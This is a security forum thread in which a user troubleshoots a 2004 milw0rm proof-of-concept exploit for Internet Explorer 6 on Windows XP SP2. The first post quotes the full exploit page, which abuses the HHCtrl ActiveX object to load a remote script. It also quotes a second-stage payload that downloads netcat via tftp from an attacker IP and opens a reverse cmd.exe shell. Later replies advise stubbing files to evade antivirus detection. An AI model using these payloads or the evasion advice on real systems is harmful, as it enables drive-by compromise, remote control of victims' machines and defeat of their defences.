Code Execution

[Armagedeon]

Could someone shed some light?

I'm now trying to recreate the code execution exploit for IE 6.0 in a XP-SP2 box.

I get the following error when I browse to the malicious web site:

Code:

An error has occured in the script onthis page.

Line:  4
Char:  1
Error: Invalid character
Code:  0
URL:   ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm

Do you want to continue running scripts on this page?

This is the htm code in my page:

Code:

<!-- 
Download this file as well for your own testing:  original htm.txt
http://www.milw0rm.com/down.php?id=723

//str0ke
-->  

<html><head><title>CMDExe - Windows Exploit - Remote code execution with parameters - Proof of Concept</title></head><BODY style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this exploit can be found at <a href="http://freehost19.websamba.com/shreddersub7/expl-discuss.htm" target="_new">hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm</a>. ? 2004 ShredderSub7
<script>
  function DisplayLocStrings() {
    Title.innerHTML = TAG_SYSCONFIG;
    Config_Link.innerHTML = TAG_OPENSYSCONFIG;
    Config_Desc.innerHTML = TAG_SYSCONFIGDESC;
  }
  </script>
<br><OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"javascript\\\" src=\\\"http://10.10.52.20/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>

</OBJECT>
<script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>

// milw0rm.com [2004-12-28]

This is the code in my htm.txt

Code:

document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/c tftp -i 10.10.52.20 GET nc.exe && nc.exe 10.10.52.20 443 -e cmd.exe && taskkill /f /im cmd.exe,'></object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");

# milw0rm.com [2004-12-28]

When the error occurs I choose yes for it to continue to run the code but it doesn't seem to continue, because I get no shell on my attacking machine...and yes I have netcat listening on port 443.

Could someone help?

[The_Denv]

Try removing some comments ... I don't think that some of those comments are for htm/l

[Armagedeon]

Thanks The_Denv

I will try it out. I belive it might have something to do with it, because when I deleted the comments and tried to save it, the AV came up and deleted the file....

Darnnnnnn AV

[The_Denv]

Thanks The_Denv

I will try it out. I belive it might have something to do with it, because when I deleted the comments and tried to save it, the AV came up and deleted the file....

Darnnnnnn AV

Nice one, sounds like it worked.
Listen, if you do not want any type of file being detected by an AV such as AVG; stub the file. muts did a presentation at SmooCon about it. Rather than linking you directly to the video, here is a thread on 'I piss on your AV' within remote-exploit discussing the video:
http://forums.remote-exploit.org/showthread.php?t=12353

Goodluck

[Thorn]

For what it's worth, something has to be correct. NAV won't even allow this RE Forums page to load on a Windows machine in either FF or IE, as it detects the code.

I had to jump to a Linux latptop to see what was posted here.

[Armagedeon]

Hi there The_Denv

Funny you mention this I have that video... I belive it is in rapidshare... :
I've been trying to download ncx99.exe, the aplication used in the video but the f#%$&#" AV doesn´t let me
I belive that even LordPE pissed him off Dammm AV...

[Armagedeon]

Thorn

For real ???????

I'm browsing with IE in a windows machine, AV is Trend, and it doesn't complaint...

I'm sorry If I caused any problems

What can I do to remedy this?

[Thorn]

Thorn

For real ???????

I'm browsing with IE in a windows machine, AV is Trend, and it doesn't complaint...

I'm sorry If I caused any problems

What can I do to remedy this?

Yup, I wouldn't lie to you, I don't know you that well.

NAV blocks it and reports it as "HTTP MS IE HHCtrl ActiveX XDom Scripting" and gives the URL, IP and Port.

As for remedying it, I guess you'd have to talk with a RE Forum Admin or Mod, and see if they think it's an issue, and if it is, what to do about it.

[theprez98]

For what it's worth, I'm viewing this thread at work with XP/FF/NAV and no problems.

[imported_=Tron=]

I'm viewing this thread at work with XP/FF/NAV and no problems.

Second that, currently viewing it with XPSP3/FF/NAV/ZA and no problems here either.

EDIT: Also tested with IE without any issues.